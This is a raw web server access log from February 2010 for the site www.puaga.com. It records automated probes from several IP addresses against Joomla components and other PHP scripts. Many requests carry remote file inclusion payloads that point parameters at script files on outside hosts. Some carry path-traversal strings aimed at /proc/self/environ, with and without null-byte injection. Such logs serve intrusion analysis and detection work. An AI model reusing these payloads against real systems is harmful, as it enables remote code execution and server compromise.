123.143.98.5 - - [21/Feb/2010:05:04:02 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:04:02 -0800] "GET /logs/access_100206.log//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:04:03 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:04:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:04:14 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:04:14 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:04:16 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:04:16 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:04:16 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:05:04:21 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:05:04:21 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:05:04:21 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:05:04:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:05:03 -0800] "GET /logs/access_100118.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:05:23 -0800] "GET /logs/access_100118.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:05:36 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:05:36 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:05:36 -0800] "GET /logs/access_100115.log//e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:06:42 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:06:45 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:06:45 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:06:45 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:06:46 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:06:50 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:06:53 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:07:36 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:07:43 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:08:03 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:04 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:04 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:04 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:36 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:36 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:08:45 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:08:45 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:08:45 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:50 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:08:50 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:08:53 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:09:00 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:37 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:37 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:37 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:40 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:40 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:40 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:09:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:45 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:09:46 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:09:52 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:09:52 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:10:18 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:10:18 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:10:18 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:10:27 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:10:34 -0800] "GET /logs/access_100206.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:10:34 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:10:51 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:10:52 -0800] "GET /logs/access_100206.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:05:10:53 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:01 -0800] "GET //index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:01 -0800] "GET /logs/access_100114.log%20%20///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:01 -0800] "GET /logs///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:04 -0800] "GET //index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:05 -0800] "GET /logs/access_100114.log%20%20///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:05 -0800] "GET /logs///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:08 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:11 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:12 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:13 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:11:14 -0800] "GET /logs/access_100128.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:25 -0800] "GET /logs///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:25 -0800] "GET //index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:26 -0800] "GET /logs/access_100114.log%20%20///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:42 -0800] "GET /logs///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:42 -0800] "GET //index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:11:44 -0800] "GET /logs/access_100114.log%20%20///index.php?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:50 -0800] "GET /logs/access_100209.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:52 -0800] "GET /logs/access_100209.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:05:11:53 -0800] "GET /logs/access_100209.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:14:06 -0800] "GET /logs/access_100118.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /become_editor.php?theme_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /become_editor.php?theme_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:42 -0800] "GET /become_editor.php?theme_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:43 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:43 -0800] "GET /logs/access_100203.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:43 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:43 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:05:14:43 -0800] "GET /logs/access_100127.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:14:55 -0800] "GET /logs/access_100124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:15 -0800] "GET /com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:15 -0800] "GET /logs/access.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:15 -0800] "GET /logs//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:15 -0800] "GET /com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:15 -0800] "GET /logs//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:15 -0800] "GET /logs/access.log%20%20//com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [21/Feb/2010:05:15:21 -0800] "GET /com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
